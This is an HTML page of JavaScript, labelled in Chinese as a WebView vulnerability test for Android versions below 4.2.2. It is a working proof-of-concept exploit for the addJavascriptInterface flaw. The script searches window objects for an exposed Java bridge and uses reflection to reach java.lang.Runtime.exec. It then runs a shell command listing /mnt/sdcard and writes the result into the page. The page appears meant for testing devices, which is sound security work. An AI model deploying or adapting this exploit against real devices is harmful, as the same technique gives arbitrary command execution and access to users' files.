<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script>
      function getContents(inputStream)
      {
        var contents = "";
        var b = inputStream.read();
        while(b != -1) {
            var bString = String.fromCharCode(b);
            contents += bString;
            b = inputStream.read();
        }
        return contents;
       }

       function execute(cmdArgs)
       {
        for (var obj in window) {
            console.log(obj);
            if ("getClass" in window[obj]) {
                alert(obj);
                return window[obj].getClass().forName("java.lang.Runtime").
                    getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
             }
         }
       }

      function onButtonClick()
      {
          try {
              var p = execute(["ls", "-l", "/mnt/sdcard/"]);
              var contents = getContents(p.getInputStream());
              var outStr = contents.replace(/\n/g, "<br/>");
              document.write(outStr);
          } catch(e) {
              alert("WebView is Safe!");
          }
      }
    </script>
</head>

<body>
<p>WebView漏洞测试（Android4.2.2以下版本可测）-（ls -l /mnt/sdcard/）</p>
<button type="button" onclick="onButtonClick()">测试</button>
</body>
</html>